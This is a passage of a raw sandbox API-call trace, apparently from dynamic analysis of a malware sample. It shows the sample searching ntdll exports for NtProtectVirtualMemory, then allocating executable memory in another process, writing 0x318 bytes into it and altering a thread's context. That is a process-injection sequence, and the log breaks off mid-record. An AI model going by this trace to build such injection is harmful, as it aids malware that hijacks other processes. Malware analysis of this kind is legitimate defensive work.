(lpString1="EtwTraceMessageVa", lpString2="NtProtectVirtualMemory") returned -1 [0141.766] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="NtProtectVirtualMemory") returned -1 [0141.766] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="NtProtectVirtualMemory") returned -1 [0141.766] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="LdrAccessResource", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="LdrAddRefDll", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="NtProtectVirtualMemory") returned -1 [0141.767] lstrcmpA (lpString1="LdrEnumResources", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrFindResource_U", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetDllPath", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetFailureData", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="NtProtectVirtualMemory") returned -1 [0141.768] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="NtProtectVirtualMemory") returned -1 [0141.769] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.769] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="NtProtectVirtualMemory") returned -1 [0141.769] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrLoadDll", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="NtProtectVirtualMemory") returned -1 [0141.770] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrResFindResource", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrResRelease", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrResSearchResource", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="NtProtectVirtualMemory") returned -1 [0141.771] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrShutdownThread", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrUnloadDll", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="NtProtectVirtualMemory") returned -1 [0141.772] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="MD4Final", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="MD4Init", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="MD4Update", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="MD5Final", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="MD5Init", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="MD5Update", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="NtProtectVirtualMemory") returned -1 [0141.773] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAccessCheck", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAddAtom", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAddAtomEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAddBootEntry", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAlertThread", lpString2="NtProtectVirtualMemory") returned -1 [0141.774] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAllocateUuids", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="NtProtectVirtualMemory") returned -1 [0141.775] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="NtProtectVirtualMemory") returned -1 [0141.776] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtCallbackReturn", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtCancelIoFile", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtCancelTimer", lpString2="NtProtectVirtualMemory") returned -1 [0141.777] lstrcmpA (lpString1="NtCancelTimer2", lpString2="NtProtectVirtualMemory") returned -1 [0141.778] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="NtProtectVirtualMemory") returned -1 [0141.778] lstrcmpA (lpString1="NtClearEvent", lpString2="NtProtectVirtualMemory") returned -1 [0141.778] lstrcmpA (lpString1="NtClose", lpString2="NtProtectVirtualMemory") returned -1 [0141.778] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="NtProtectVirtualMemory") returned -1 [0141.778] lstrcmpA (lpString1="NtCommitComplete", lpString2="NtProtectVirtualMemory") returned -1 [0141.778] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="NtProtectVirtualMemory") returned -1 [0141.778] lstrcmpA (lpString1="NtCommitTransaction", lpString2="NtProtectVirtualMemory") returned -1 [0141.778] lstrcmpA (lpString1="NtCompactKeys", lpString2="NtProtectVirtualMemory") returned -1 [0141.779] lstrcmpA (lpString1="NtCompareObjects", lpString2="NtProtectVirtualMemory") returned -1 [0141.779] lstrcmpA (lpString1="NtCompareTokens", lpString2="NtProtectVirtualMemory") returned -1 [0141.779] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="NtProtectVirtualMemory") returned -1 [0141.779] lstrcmpA (lpString1="NtCompressKey", lpString2="NtProtectVirtualMemory") returned -1 [0141.779] lstrcmpA (lpString1="NtConnectPort", lpString2="NtProtectVirtualMemory") returned -1 [0141.780] VirtualFree (lpAddress=0xb30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.794] LocalAlloc (uFlags=0x0, uBytes=0x318) returned 0x629120 [0141.794] VirtualAllocEx (hProcess=0x174, lpAddress=0x0, dwSize=0x318, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0141.795] NtGetContextThread (in: ThreadHandle=0x16c, Context=0x19eb60 | out: Context=0x19eb60*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x30, [65]=0xc7, [66]=0x58, [67]=0xd7, [68]=0xfe, [69]=0xf, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0xe0, [74]=0x25, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x400004, SegGs=0x10000, SegFs=0xbac63980, SegEs=0x7ff6, SegDs=0xcff58, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x25e000, Ecx=0x0, Eax=0x25e000, Ebp=0x0, Eip=0x25e000, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x80, [45]=0x39, [46]=0xc6, [47]=0xba, [48]=0xf6, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.795] WriteProcessMemory (in: hProcess=0x174, lpBaseAddress=0x20000, lpBuffer=0x629120*, nSize=0x318, lpNumberOfBytesWritten=0x19f03c | out: lpBuffer=0x629120*, lpNumberOfBytesWritten=0x19f03c*=0x318) returned 1 [0141.857] NtSetContextThread (ThreadHandle=0x16c, Context=0x19eb60*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 